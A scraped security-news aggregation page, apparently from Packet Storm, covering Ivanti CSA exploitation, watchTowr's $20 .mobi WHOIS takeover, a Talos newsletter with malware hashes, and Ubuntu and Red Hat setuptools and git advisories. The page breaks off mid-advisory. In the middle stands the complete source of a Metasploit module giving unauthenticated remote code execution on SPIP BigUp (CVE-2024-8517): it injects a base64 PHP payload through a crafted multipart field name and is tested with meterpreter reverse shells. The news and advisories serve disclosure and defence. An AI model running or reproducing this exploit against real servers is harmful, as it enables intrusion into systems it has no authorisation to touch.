Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild.
The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances.
"An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows

Enterprise Security / Threat Intelligence

Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild.

The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances.

"An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution," Ivanti noted in an advisory released earlier this week. "The attacker must have admin level privileges to exploit this vulnerability."

The flaw impacts Ivanti CSA 4.6, which has currently reached end-of-life status, requiring that customers upgrade to a supported version going forward. That said, it has been addressed in CSA 4.6 Patch 519.

"With the end-of-life status this is the last fix that Ivanti will backport for this version," the Utah-based IT software company added. "Customers must upgrade to Ivanti CSA 5.0 for continued support."

"CSA 5.0 is the only supported version and does not contain this vulnerability. Customers already running Ivanti CSA 5.0 do not need to take any additional action."

On Friday, Ivanti updated its advisory to note that it observed confirmed exploitation of the flaw in the wild targeting a "limited number of customers."

It did not reveal additional specifics related to the attacks or the identity of the threat actors weaponizing it, however, a number of other vulnerabilities in Ivanti products have been exploited as a zero-day by China-nexus cyberespionage groups.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 4, 2024.

The disclosure also comes as cybersecurity company Horizon3.ai posted a detailed technical analysis of a critical deserialization vulnerability (CVE-2024-29847, CVSS score: 10.0) impacting Endpoint Manager (EPM) that results in remote code execution.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ivanti Warns of Active Exploitation of Newly Patched Cloud Appliance Vulnerability

Proof of concept remote code execution exploit for Ivanti EPM versions prior to 2022 SU6 or the 2024 September update.

Ivanti EPM Remote Code Execution

Proof of concept remote code execution exploit for GeoServer versions prior 2.23.6, 2.24.4, and 2.25.2.

GeoServer Remote Code Execution

Their findings highlight the frailty of some of the mechanisms for establishing trust on the Internet.

Source: Aree\_S via Shutterstock

Security researchers' ability to gain control of a chunk of the Internet's infrastructure for a mere $20 has focused attention on the fragility of the trust and cybersecurity mechanisms that organizations and users rely on daily.

The troubling event began with researchers at watchTowr on a whim looking for remote code execution vulnerabilities in WHOIS clients while at the recent Black Hat USA conference in Las Vegas. In poking around, the researchers discovered that the WHOIS server for the .mobi top level domain (TLD) — for mobile-optimized sites — had migrated a few years ago from "whois.dotmobiregistry.net" to "whois.nic.mobi". After the change, the registration for the original domain (whois.dotmobiregistry.net) expired last December.

**An Accidental Discovery**

A WHOIS server is like a public phone book for the Internet and contains information on the owners of an IP address or website along with lots of other related information. A WHOIS client is a tool that queries for and retrieves information about a specific domain name or IP address from a WHOIS server.

On a lark, the watchTowr researchers spent $20 to register the expired whois.dotmobiregistry.net in the company's name and stick a WHOIS server behind it to see if any WHOIS clients would query it. Their initial presumption was that few, if any, WHOIS clients would still touch the decommissioned server after the migration to the new .mobi authoritative WHOIS server (whois.nic.mobi) a few years ago.

To their surprise — and consternation — watchTowr researchers found over 76,000 unique IP addresses sending queries to their WHOIS server in just a couple hours. In about two days that number had ballooned to over 2.5 million queries from 135,000 unique systems worldwide.

Contrary to their expectations, among those querying watchTowr's WHOIS server were major domain registrars and websites performing WHOIS functions. Also querying watchTowr's WHOIS domain were mail servers for numerous government organizations in the US, Israel, Pakistan, India, the Philippines, a military entity in Sweden, and countless universities worldwide. Troublingly, even some security-related websites, including VirusTotal, queried watchTowr's WHOIS server as if it were the authoritative server for the .mobi TLD.

Had watchTowr been a bad actor, they could have easily abused their status as the owner of whois.dotmobiregistry.net to deliver malicious payloads to anyone querying the server, or to passively monitor email communications and potentially create other mayhem.

"In the wrong hands, owning the domain could enable attackers to 'respond' to queries and inject malicious payloads to exploit vulnerabilities in WHOIS clients," watchTowr's CEO and founder Benjamin Harris said in a FAQ on his company's discovery. From the standpoint of government mail servers reaching out to watchTowr's WHOIS servers, "traffic analysis can be performed to passively observe and infer email communication," he said.

**A Serious Domain Verification Weakness**

But even more troubling than that was watchTowr’s discovery of multiple Certificate Authorities (CA) — including those issuing TLS/SSL certificates for domains such as ‘microsoft.mobi and ‘google.mobi — using watchTowr’s server for domain verification purposes.

"It turns out that a number of TLS/SSL authorities will verify ownership of a domain by parsing WHOIS data for your domain— say watchTowr.mobi — and pulling out email addresses defined as the 'administrative contact'," watchTowr said. "The process is to then send that email address a verification link. Once clicked, the certificate authority is convinced that you control the domain that you are requesting a TLS/SSL cert for, and they will happily mint you a certificate."

In other words, watchTowr could provide its own email address to certificate authorities (CAs) in response to domain ownership queries and obtain TLS/SSL certificates on behalf of other organizations. Once again, contrary to expectations, watchTowr discovered multiple well known CAs — including Trustico, Comodo, GlobalSign, and Sectigo — using WHOIS data for domain verification.

"For 'microsoft.mobi', watchTowr demonstrated that CA GlobalSign would parse responses provided by its WHOIS server and present '\[email protected\]' as an authoritative email address," the security vendor said. "watchTowr's discovery effectively undermines the certificate authority process for the entire .mobi TLD, a process that has been targeted by nation-states overtly for years." The research highlights the trivial loopholes in the Internet's TLS/SSL vital encryption processes and structures and shows why trust in them is misplaced at this stage, the researchers wrote.

Nick France, CTO at Sectigo, says the issue has to do with CAs being allowed to use administrative emails on public WHOIS records for domain names. "However, the researchers found that the .mobi registry had changed their WHOIS server in the past and the 'old' name was now available as a registerable domain name — which they did," France says.

This is only a problem if a CA uses an outdated list of WHOIS server, he says. In that event, a CA's WHOIS query could get directed to an outdated server and any attacker that owns it could send any output in response, including an email address of their choice. "This leads to a failure of the domain verification process and thus mis-issued certificates."

The issue that watchTowr discovered highlights why CAs must keep their systems updated, especially with respect to critical processes like domain control validation, French says. "WHOIS is an old, insecure system — often neglected by researchers and users alike, leaving it primed for the discovery of flaws like this one," he notes.

While it may impact only smaller TLDs like .mobi, as opposed to .com, .net, and .gov, it still demonstrates a serious vulnerability in the domain verification process, he says.

Tim Callan, Sectigo's Chief Experience Officer, adds how the incident highlights a need to update some of the rules around Domain Control Validation (DCV). "We should expect the Certification Authority Browser Forum to move quickly on these changes in order to plug this particular hole."

In the meantime, the nonprofit Internet monitoring entity ShadowServer has sinkholed the dotmobiregistry.net domain and the whois.dotmobiregisry.net hostname and is redirecting all queries to the server to the legitimate WHOIS responsible for .mobi domains. "If you have code/systems still using the expired http://whois.dotmobiregistry.net to make WHOIS queries for the .mobi TLD, please update immediately to use the correct authoritative WHOIS server http://whois.nic.mobi," said Piotr Kijewski, ShadowServer's CEO in an email.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

For Just $20, Researchers Seize Part of Internet Infrastructure

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America.

Thursday, September 12, 2024 14:00

I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.  

That’s because the White House announced a new initiative last week for the U.S. government called the “Service for America” initiative designed to train new workers in the cybersecurity field. This measure directs U.S. federal agencies to help recruit and prepare Americans for jobs in cybersecurity and AI by removing certain degree requirements and emphasizing skills-based hiring. This means, hopefully, more educational resources for people looking to break into cybersecurity. 

On its face, I’m all in favor of this. I did eventually go back to school to get my associate's degree in cybersecurity, but much of what I’ve learned about this field has been from working at Talos and spending time around my talented and intelligent colleagues, many of whom did not go to college for cybersecurity.  

The U.S. government also has separate initiatives to support neurodivergent candidates who want to work in security, as well as those who are blind and visually impaired. 

My concern is that, even if we do train these employees and give them the proper skills, it’s on companies to eventually hire them.  

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. Yet hiring in the industry has remained flat, according to a soon-to-be-released report from cybersecurity non-profit ISC2. This year, the global security workforce is estimated to be 5.5 million, which is only a 0.1 percent increase year over year, according to the report. 

Among the more than 15,000 cybersecurity practitioners from around the globe who responded to the study, 38 percent of respondents said their organizations had experienced a cybersecurity hiring freeze over the past year, up 8 percent from 2023. Thirty-seven percent of respondents reported budget cuts to the security program, and another 25 percent said their teams had experienced layoffs.  

That same CyberSeek report also found that, in the U.S., the amount of cybersecurity-related job postings decreased by 29 percent year-over-year. 

So as these skills gap-closing programs begin, we need to be thinking about what skills, exactly, managers want their workers to be trained in. There is obviously some sort of disconnect here between the people who want to work in security compared to the companies or managers who want to hire them. Or there just simply isn’t enough money to go around right now to handle staffing up cybersecurity teams, and that’s just the reality of the current economy in the U.S. and globally.  

I’m not saying this to discourage anyone from entering the security space or spread doom and gloom. But I do think it’s important to acknowledge that there are many already skilled and trained workers who simply cannot find work or are treading water throwing dozens of applications at the wall to see what sticks. 

I’ve seen too many people posting on LinkedIn recently looking for a cybersecurity job to think that the solution to bolstering security is getting \*another\* worker in with the same skillset to compete for the same job opening as someone who’s been in the industry for 10 years. 

**The one big thing **

Talos recently uncovered a new threat called “DragonRank” that primarily targets countries in Asia — and a few in Europe — operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation. DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. Their PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH) mechanism ensures that the legitimate file can load the PlugX without raising suspicion. 

**Why do I care? **

This group compromises Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users. DragonRank engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. The actor then takes these compromised websites and promotes them, effectively turning these sites into platforms for scam operations. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malware used in these attacks. Talos has confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this campaign, so it’s clearly still active and potentially growing. 

**Top security headlines of the week **

**A new type of attack called “RAMBO” could allow adversaries to steal data over air-gapped networks with RAM radio signals.** An Israeli academic researcher recently announced the discovery of RAMBO (Radiation of Air-gapped Memory Bus for Offense), in which an attacker could generate electromagnetic radiation from a device’s RAM to send data from air-gapped computers. Air-gapped systems are otherwise offline networks that are extremely isolated, often used in critical environments like government agencies, weapons systems and nuclear power stations. While RAMBO does not pose a threat for any hacker with access to the internet, it could open the door for insider threats with access to the network to deploy malware through physical media like USB drives or supply chain attacks. RAMBO could allow attackers to seal encoded files, encryption keys, images, keystrokes and biometric information from these systems at a rate of 1,000 bits per second. Researchers conducted tests into these types of attacks over distances of up to 23 feet. A technical paper published on the topic includes several potential mitigations, including RAM jamming, external EM jamming and Faraday enclosures around potentially targeted systems. (Bleeping Computer, SecurityWeek) 

**Commercial spyware makers are still finding ways to bypass government sanctions and, in some cases, have made their tools harder to detect.** A new report from the Atlantic Council found that “Most available evidence suggests that spyware sales are a present reality and likely to continue.” The report specifically highlights increased activity from Intellexa and the NSO Group, two companies known for creating and selling spyware tools that have been targeted over the past few years by international sanctions. These companies, and specifically Intellexa, have found ways to work around sanctions by restructuring their businesses with subsidiaries, partners and other relationships spread across multiple geographic areas. Intellexa is known for creating the Predator spyware, while the NSO Group is infamous for the Pegasus spyware. Both pieces of software often target high-risk individuals, sometimes by governments, such as journalists, politicians and activists. Security researchers also recently found that Intellexa has established new infrastructure in the Democratic Republic of the Congo and Angola, making “it more difficult for researchers and cybersecurity defenders to track the spread of Predator.” (Dark Reading, The Register) 

**Several Western intelligence agencies have formally charged the Russian GRU for carrying out cyber attacks against Ukraine designed to disrupt aid efforts.** Government agencies in the U.S., U.K. and several other countries blamed Unit 29155, which has been linked to past espionage campaigns, with targeting government and civilian agencies and civil society organizations in Western Europe, the EU and NATO after Russia invaded Ukraine in 2022. Intelligence agencies in the Netherlands, Czech Republic, Germany, Estonia, Latvia, Canada and Australia all signed the declaration. They also formally blamed Unit 29155 for the WhisperGate campaign, a coordinated attack on Ukrainian government agencies in January 2022 that seemed to set the stage for a physical ground invasion. The announcement stated that WhisperGate has since been used to “scout and disrupt” aid deliveries to Ukraine. When Talos first reported on WhisperGate in 2022, our researchers stated that “attackers used stolen credentials in the campaign and they likely had access to the victim network for months before the attack, a typical characteristic of sophisticated advanced persistent threat (APT) operations.” (Reuters, BBC) 

**Can’t get enough Talos? **

*   The 2024 Threat Landscape State of Play 
*   Vulnerability in Tencent WeChat custom browser could lead to remote code execution 
*   Watch our new documentary, "The Light We Keep: A Project PowerUp Story" 
*   Vulnerability in Acrobat Reader could lead to remote code execution; Microsoft patches information disclosure issue in Windows API 
*   Four zero-days included in group of 79 vulnerabilities Microsoft discloses, including one with 9.8 severity score 

**Upcoming events where you can find Talos **

**LABScon** **(Sept. 18 - 21)**  

_Scottsdale, Arizona_ 

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos  

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd

We can try to bridge the cybersecurity skills gap, but that doesn’t necessarily mean more jobs for defenders

This Metasploit module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. This critical vulnerability affects all versions of SPIP from 4.0 up to and including 4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code remotely via the public interface. The vulnerability has been patched in versions 4.3.2, 4.2.16, and 4.1.18.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Spip  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SPIP BigUp Plugin Unauthenticated RCE',        'Description' => %q{          This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.          The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper          handling of multipart form data in file uploads, an attacker can inject and execute          arbitrary PHP code on the target server.          This critical vulnerability affects all versions of SPIP from 4.0 up to and including          4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code          remotely via the public interface. The vulnerability has been patched in versions          4.3.2, 4.2.16, and 4.1.18.        },        'Author' => [          'Vozec',            # Vulnerability Discovery          'Laluka',           # Vulnerability Discovery          'Julien Voisin',    # Code Review          'Valentin Lobstein' # Metasploit Module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-8517'],          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/'],          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']        ],        'Platform' => %w[php unix linux win],        'Arch' => %w[ARCH_PHP ARCH_CMD],        'Targets' => [          [            'PHP In-Memory', {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell', {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell', {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2024-09-06',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('FORM_PAGE', [true, 'A page with a form.', 'Auto'])      ]    )  end  def check    rversion = spip_version || spip_plugin_version('spip')    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion    print_status("SPIP Version detected: #{rversion}")    vulnerable_ranges = [      { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },      { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },      { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }    ]    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }    unless is_vulnerable      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")    end    print_good("SPIP version #{rversion} is vulnerable.")    plugin_version = spip_plugin_version('bigup')    unless plugin_version      print_warning('Could not determine the version of the bigup plugin.')      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")    end    print_status("Bigup plugin version detected: #{plugin_version}")    if plugin_version < Rex::Version.new('3.2.12')      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")    end    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")  end  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).  # We need to check multiple pages because the configuration of SPIP can vary.  def get_form_data    pages = %w[login spip_pass contact]    if datastore['FORM_PAGE']&.downcase != 'auto'      pages = [datastore['FORM_PAGE']]    end    pages.each do |page|      url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")      res = send_request_cgi('method' => 'GET', 'uri' => url)      next unless res&.code == 200      doc = res.get_html_document      action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text      args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text      next unless action && args      print_status("Found formulaire_action: #{action}")      print_status("Found formulaire_action_args: #{args[0..20]}...")      return { action: action, args: args }    end    nil  end  # This function generates PHP code to execute a given payload on the target.  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.  # The payload is encoded in base64 to prevent issues with special characters.  # The generated PHP code includes the necessary preamble and system block to execute the payload.  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.  def php_exec_cmd(encoded_payload)    vars = Rex::RandomIdentifier::Generator.new    dis = "$#{vars[:dis]}"    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)    <<-END_OF_PHP_CODE              #{php_preamble(disabled_varname: dis)}              $c = base64_decode("#{encoded_clean_payload}");              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE  end  def exploit    form_data = get_form_data    unless form_data      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')    end    print_status('Preparing to send exploit payload to the target...')    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')    post_data = Rex::MIME::Message.new    # This line is necessary for the form to be valid, works in tandem with formulaire_action_args    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')    # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability    post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')    # Injection is performed here. The die() function is used to avoid leaving traces in the logs,    # prevent errors, and stop the execution of PHP after the injection.    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")    # This is necessary for the form to be accepted    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'spip.php'),      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    }, 1)  endend

SPIP BigUp 4.3.1 / 4.2.15 / 4.1.17 Unauthenticated Remote Code Execution

Ubuntu Security Notice 7002-1 - It was discovered that setuptools was vulnerable to remote code execution. An attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-7002-1  
September 12, 2024

python-setuptools, setuptools vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

setuptools could be made to crash or run programs if it received  
specially crafted network traffic.

Software Description:  
- setuptools: Python Distutils Enhancements  
- python-setuptools: Python Distutils Enhancements

Details:

It was discovered that setuptools was vulnerable to remote code  
execution. An attacker could possibly use this issue to execute arbitrary  
code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   python3-setuptools              68.1.2-2ubuntu1.1

Ubuntu 22.04 LTS  
   pypy-setuptools                 44.1.1-1.2ubuntu0.22.04.1+esm1  
                                   Available with Ubuntu Pro  
   python-setuptools               44.1.1-1.2ubuntu0.22.04.1+esm1  
                                   Available with Ubuntu Pro  
   python3-setuptools              59.6.0-1.2ubuntu0.22.04.2

Ubuntu 20.04 LTS  
   pypy-setuptools                 44.0.0-2ubuntu0.1+esm1  
                                   Available with Ubuntu Pro  
   python-setuptools               44.0.0-2ubuntu0.1+esm1  
                                   Available with Ubuntu Pro  
   python3-setuptools              45.2.0-1ubuntu0.2

Ubuntu 18.04 LTS  
   pypy-setuptools                 39.0.1-2ubuntu0.1+esm1  
                                   Available with Ubuntu Pro  
   python-setuptools               39.0.1-2ubuntu0.1+esm1  
                                   Available with Ubuntu Pro  
   python3-setuptools              39.0.1-2ubuntu0.1+esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   pypy-setuptools                 20.7.0-1ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   python-setuptools               20.7.0-1ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   python3-setuptools              20.7.0-1ubuntu0.1~esm2  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   python-setuptools               3.3-1ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   python3-setuptools              3.3-1ubuntu2+esm2  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-7002-1  
   CVE-2024-6345

Package Information:  
   https://launchpad.net/ubuntu/+source/setuptools/68.1.2-2ubuntu1.1

Ubuntu Security Notice USN-7002-1

Red Hat Security Advisory 2024-6612-03 - An update for fence-agents is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6612.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: fence-agents security updateAdvisory ID:        RHSA-2024:6612-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6612Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for fence-agents is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6612-03

Red Hat Security Advisory 2024-6611-03 - An update for fence-agents is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6611.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: fence-agents security updateAdvisory ID:        RHSA-2024:6611-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6611Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for fence-agents is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6611-03

Red Hat Security Advisory 2024-6610-03 - An update for git is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6610.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git security updateAdvisory ID:        RHSA-2024:6610-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6610Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-32002====================================================================Summary: An update for git is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it 